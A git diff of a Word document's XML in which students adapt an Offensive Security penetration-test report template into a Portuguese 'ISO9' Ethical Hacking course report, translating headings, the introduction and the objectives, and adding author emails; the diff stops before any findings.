--- a/2º Período/Ethical Hacking/Relatório - Trabalho Final.docx
+++ b/2º Período/Ethical Hacking/Relatório - Trabalho Final.docx
@@ -26,7 +26,7 @@
           <w:szCs w:val="84"/>
           <w:u w:color="17375E"/>
         </w:rPr>
-        <w:t>OFFENSIVE SECURITY</w:t>
+        <w:t>ISO 09</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -93,27 +93,7 @@
           <w:szCs w:val="60"/>
           <w:u w:color="17375E"/>
         </w:rPr>
-        <w:t>Internal Lab an</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="60"/>
-          <w:szCs w:val="60"/>
-          <w:u w:color="17375E"/>
-        </w:rPr>
-        <w:t>d</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="60"/>
-          <w:szCs w:val="60"/>
-          <w:u w:color="17375E"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Exam</w:t>
+        <w:t xml:space="preserve">ISO9 </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -158,6 +138,52 @@
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:jc w:val="center"/>
         <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular" w:hint="eastAsia"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId7" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
+            <w:sz w:val="32"/>
+            <w:szCs w:val="32"/>
+          </w:rPr>
+          <w:t>lucas.bona@pucpr.edu.br</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular" w:hint="eastAsia"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId8" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
+            <w:sz w:val="32"/>
+            <w:szCs w:val="32"/>
+          </w:rPr>
+          <w:t>silva.ary@pucpr.edu.br</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
           <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
@@ -169,7 +195,7 @@
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:t>student@youremailaddress.com</w:t>
+        <w:t>adriano.vale@pucpr.edu.br</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -189,7 +215,7 @@
           <w:sz w:val="40"/>
           <w:szCs w:val="40"/>
         </w:rPr>
-        <w:t>OSID: XX</w:t>
+        <w:t xml:space="preserve">OSID: </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -197,83 +223,28 @@
           <w:sz w:val="40"/>
           <w:szCs w:val="40"/>
         </w:rPr>
-        <w:t>X</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
-          <w:sz w:val="40"/>
-          <w:szCs w:val="40"/>
-        </w:rPr>
-        <w:t>X</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
-          <w:sz w:val="40"/>
-          <w:szCs w:val="40"/>
-        </w:rPr>
-        <w:t>X</w:t>
+        <w:t>Apache/2.4.29 (Ubuntu)</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="BodyA"/>
-        <w:spacing w:before="200" w:after="0" w:line="600" w:lineRule="auto"/>
+        <w:spacing w:before="200" w:after="0" w:line="360" w:lineRule="auto"/>
         <w:jc w:val="center"/>
         <w:rPr>
           <w:rFonts w:ascii="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria" w:cs="Cambria"/>
-          <w:sz w:val="40"/>
-          <w:szCs w:val="40"/>
+          <w:sz w:val="144"/>
+          <w:szCs w:val="144"/>
         </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria" w:cs="Cambria"/>
           <w:noProof/>
-          <w:sz w:val="40"/>
-          <w:szCs w:val="40"/>
-        </w:rPr>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6531013E" wp14:editId="2409A5A1">
-            <wp:extent cx="2602865" cy="1735455"/>
-            <wp:effectExtent l="0" t="0" r="0" b="0"/>
-            <wp:docPr id="1073741826" name="officeArt object" descr="red-front-page-large.png"/>
-            <wp:cNvGraphicFramePr/>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="1073741826" name="red-front-page-large.png" descr="red-front-page-large.png"/>
-                    <pic:cNvPicPr>
-                      <a:picLocks noChangeAspect="1"/>
-                    </pic:cNvPicPr>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId7"/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr>
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="2602865" cy="1735455"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                    <a:ln w="12700" cap="flat">
-                      <a:noFill/>
-                      <a:miter lim="400000"/>
-                    </a:ln>
-                    <a:effectLst/>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
+          <w:sz w:val="144"/>
+          <w:szCs w:val="144"/>
+        </w:rPr>
+        <w:t>ISO9</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -343,14 +314,6 @@
           <w:lang w:eastAsia="en-ZA"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
-          <w:sz w:val="16"/>
-          <w:szCs w:val="16"/>
-        </w:rPr>
-        <w:br w:type="page"/>
-      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -376,7 +339,7 @@
           </w14:textOutline>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>Table of Contents</w:t>
+        <w:t>Conteúdos</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -445,7 +408,19 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:t>1.0 Offensive Security Lab and Exam Penetration Test Report</w:t>
+        <w:t xml:space="preserve">1.0 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>ISO9</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Penetration Test Report</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -506,7 +481,15 @@
           <w:noProof/>
           <w:lang w:val="fr-FR"/>
         </w:rPr>
-        <w:t>1.1 Introduction</w:t>
+        <w:t xml:space="preserve">1.1 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
+          <w:noProof/>
+          <w:lang w:val="fr-FR"/>
+        </w:rPr>
+        <w:t>Introdução</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -567,7 +550,15 @@
           <w:noProof/>
           <w:lang w:val="fr-FR"/>
         </w:rPr>
-        <w:t>1.2 Objective</w:t>
+        <w:t xml:space="preserve">1.2 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
+          <w:noProof/>
+          <w:lang w:val="fr-FR"/>
+        </w:rPr>
+        <w:t>Objetivo</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -627,7 +618,14 @@
           <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
           <w:noProof/>
         </w:rPr>
-        <w:t>1.3 Requirements</w:t>
+        <w:t xml:space="preserve">1.3 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>Requisitos</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -687,13 +685,13 @@
           <w:noProof/>
           <w:lang w:val="fr-FR"/>
         </w:rPr>
-        <w:t xml:space="preserve">2.0 Sample Report </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:t>– High-Level Summary</w:t>
+        <w:t xml:space="preserve">2.0 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>Resumo</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -753,7 +751,14 @@
           <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
           <w:noProof/>
         </w:rPr>
-        <w:t>2.1 Sample Report - Recommendations</w:t>
+        <w:t xml:space="preserve">2.1 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>Recomendações</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -813,13 +818,37 @@
           <w:noProof/>
           <w:lang w:val="fr-FR"/>
         </w:rPr>
-        <w:t xml:space="preserve">3.0 Sample Report </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:t>– Methodologies</w:t>
+        <w:t xml:space="preserve">3.0 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>Me</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>t</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>odolog</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>ia</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>s</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -880,14 +909,23 @@
           <w:noProof/>
           <w:lang w:val="fr-FR"/>
         </w:rPr>
-        <w:t xml:space="preserve">3.1 Sample Report </w:t>
+        <w:t xml:space="preserve">3.1 </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
           <w:noProof/>
-        </w:rPr>
-        <w:t>– Information Gathering</w:t>
+          <w:lang w:val="fr-FR"/>
+        </w:rPr>
+        <w:t>Coleta</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
+          <w:noProof/>
+          <w:lang w:val="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> de Informação</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -947,7 +985,14 @@
           <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
           <w:noProof/>
         </w:rPr>
-        <w:t>3.2 Sample Report – Service Enumeration</w:t>
+        <w:t>3.2</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
+          <w:noProof/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Enumeração de Serviço</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1007,7 +1052,14 @@
           <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
           <w:noProof/>
         </w:rPr>
-        <w:t>3.3 Sample Report – Penetration</w:t>
+        <w:t xml:space="preserve">3.3 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>Pentest</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1067,7 +1119,14 @@
           <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
           <w:noProof/>
         </w:rPr>
-        <w:t>3.4 Sample Report – Maintaining Access</w:t>
+        <w:t xml:space="preserve">3.4 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>Acesso Mantido</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1128,14 +1187,22 @@
           <w:noProof/>
           <w:lang w:val="fr-FR"/>
         </w:rPr>
-        <w:t xml:space="preserve">3.5 Sample Report </w:t>
+        <w:t>3.5</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
           <w:noProof/>
-        </w:rPr>
-        <w:t>– House Cleaning</w:t>
+          <w:lang w:val="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>Limpeza</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1194,7 +1261,13 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:t>4.0 Additional Items Not Mentioned in the Report</w:t>
+        <w:t xml:space="preserve">4.0 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>Informações Adicionais</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1289,7 +1362,23 @@
           </w14:textOutline>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>1.0 Offensive Security Lab and Exam Penetration Test Report</w:t>
+        <w:t xml:space="preserve">1.0 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Bold" w:eastAsia="Cambria" w:hAnsi="Roboto Bold" w:cs="Cambria"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:u w:color="000000"/>
+          <w:lang w:eastAsia="en-ZA"/>
+          <w14:textOutline w14:w="12700" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:miter w14:lim="400000"/>
+          </w14:textOutline>
+        </w:rPr>
+        <w:t>ISO9 External Penetration Test Report</w:t>
       </w:r>
       <w:bookmarkEnd w:id="0"/>
     </w:p>
@@ -1315,74 +1404,169 @@
           <w:u w:color="000000"/>
           <w:lang w:val="fr-FR"/>
         </w:rPr>
-        <w:t>1.1 Introduction</w:t>
+        <w:t xml:space="preserve">1.1 </w:t>
       </w:r>
       <w:bookmarkEnd w:id="1"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:color w:val="000000"/>
+          <w:u w:color="000000"/>
+          <w:lang w:val="fr-FR"/>
+        </w:rPr>
+        <w:t>Introdução</w:t>
+      </w:r>
+      <w:bookmarkStart w:id="2" w:name="_Toc59959348"/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="BodyA"/>
-        <w:spacing w:line="288" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
-        </w:rPr>
-        <w:t xml:space="preserve">The Offensive Security Lab and Exam penetration test report contains all efforts that were conducted </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
-        </w:rPr>
-        <w:t>in</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
-        </w:rPr>
-        <w:t>order to</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> pass the Offensive Security course. This report should contain</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
-        </w:rPr>
-        <w:t>all items that were used to pass the overall exam</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> and it</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> will be graded from a standpoint of correctness and fullness to all aspects of the exam. The purpose of this report is to ensure that the student has a full understanding of penetration testing methodologies as well as the technical knowledge to pass the qualifications for the Offensive Security Certified Professional.</w:t>
+        <w:rPr>
+          <w:lang w:val="en-ZA"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-ZA"/>
+        </w:rPr>
+        <w:t xml:space="preserve">O relatório do </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-ZA"/>
+        </w:rPr>
+        <w:t>Pentest</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-ZA"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ISO9 contém todos os esforços realizados para aprovar o curso de </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-ZA"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Ethical </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-ZA"/>
+        </w:rPr>
+        <w:t>Hacking. Este relatório incl</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-ZA"/>
+        </w:rPr>
+        <w:t>ui</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-ZA"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> todos os elementos utilizados para passar no exame geral e será avaliado com base na correção e abrangência de todos os aspectos do exame. O propósito deste relatório é garantir que o estudante </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-ZA"/>
+        </w:rPr>
+        <w:t xml:space="preserve">demonstre </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-ZA"/>
+        </w:rPr>
+        <w:t xml:space="preserve">uma compreensão completa das metodologias de </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-ZA"/>
+        </w:rPr>
+        <w:t>Pentesting</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-ZA"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, bem como o conhecimento técnico necessário para </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-ZA"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ser </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-ZA"/>
+        </w:rPr>
+        <w:t>aprova</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-ZA"/>
+        </w:rPr>
+        <w:t>do</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-ZA"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> o curso.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Ttulo2"/>
+        <w:spacing w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:color w:val="000000"/>
+          <w:u w:color="000000"/>
+          <w:lang w:val="fr-FR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:color w:val="000000"/>
+          <w:u w:color="000000"/>
+          <w:lang w:val="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">1.2 </w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="2"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:color w:val="000000"/>
+          <w:u w:color="000000"/>
+          <w:lang w:val="fr-FR"/>
+        </w:rPr>
+        <w:t>Objetivos</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
+        <w:rPr>
+          <w:lang w:val="fr-FR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="fr-FR"/>
+        </w:rPr>
+        <w:t>O objetivo desta avaliação é realizar um teste interno de penetração na Offensive Security Lab e na rede de exames. O estudante tem a tarefa de seguir uma abordagem metódica para obter acesso aos objetivos estabelecidos. Este teste deve simular um teste de penetração real e como você começaria do início ao fim, incluindo o relatório geral. Uma página de exemplo já foi criada para você nas últimas seções deste documento, que deve fornecer informações suficientes sobre o que é esperado para passar neste curso. Use o relatório de exemplo como um guia para orientá-lo na elaboração do relatório.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1397,7 +1581,7 @@
           <w:u w:color="000000"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="2" w:name="_Toc59959348"/>
+      <w:bookmarkStart w:id="3" w:name="_Toc59959349"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
@@ -1405,41 +1589,11 @@
           <w:bCs w:val="0"/>
           <w:color w:val="000000"/>
           <w:u w:color="000000"/>
-          <w:lang w:val="fr-FR"/>
-        </w:rPr>
-        <w:t>1.2 Objective</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="2"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyA"/>
-        <w:spacing w:line="288" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
-        </w:rPr>
-        <w:t>The objective of this assessment is to perform an internal penetration test against the Offensive Security Lab and Exam network. The student is tasked with following methodical approach in obtaining access to the objective goals. This test should simulate an actual penetration test and how you would start from beginning to end, including the overall report. An example page has already been created for you at the latter portions of this document that should give you ample information on what is expected to pass this course. Use the sample report as a guideline to get you through the reporting.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Ttulo2"/>
-        <w:spacing w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Bold" w:eastAsia="Roboto Bold" w:hAnsi="Roboto Bold" w:cs="Roboto Bold"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:color w:val="000000"/>
-          <w:u w:color="000000"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="3" w:name="_Toc59959349"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">1.3 </w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="3"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
@@ -1449,9 +1603,8 @@
           <w:u w:color="000000"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>1.3 Requirements</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="3"/>
+        <w:t>Requisitos</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1487,7 +1640,7 @@
           <w:rStyle w:val="NoneA"/>
           <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
         </w:rPr>
-        <w:t>Overall High-Level Summary and Recommendations (non-technical)</w:t>
+        <w:t>Resumo e Recomendações</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1508,17 +1661,22 @@
           <w:rStyle w:val="NoneA"/>
           <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
         </w:rPr>
-        <w:t xml:space="preserve">Methodology walkthrough and detailed outline of steps </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
+        <w:t>Metodologias</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="NoneA"/>
           <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
         </w:rPr>
-        <w:t>taken</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="NoneA"/>
+          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
+        </w:rPr>
+        <w:t>utilizadas e quais os passos dados</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1538,7 +1696,7 @@
           <w:rStyle w:val="NoneA"/>
           <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
         </w:rPr>
-        <w:t>Each finding with included screenshots, walkthrough, sample code, and proof.txt if applicable.</w:t>
+        <w:t>Prints, passo a passo, código, provas</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1560,7 +1718,7 @@
           <w:rStyle w:val="NoneA"/>
           <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
         </w:rPr>
-        <w:t>Any additional items that were not included</w:t>
+        <w:t>Informações Adicionais</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1606,8 +1764,9 @@
           <w:lang w:val="fr-FR"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">2.0 Sample Report </w:t>
-      </w:r>
+        <w:t xml:space="preserve">2.0 </w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="4"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
@@ -1616,244 +1775,16 @@
           <w:color w:val="000000"/>
           <w:u w:color="000000"/>
         </w:rPr>
-        <w:t>– High-Level Summary</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="4"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyA"/>
-        <w:spacing w:line="288" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
-        </w:rPr>
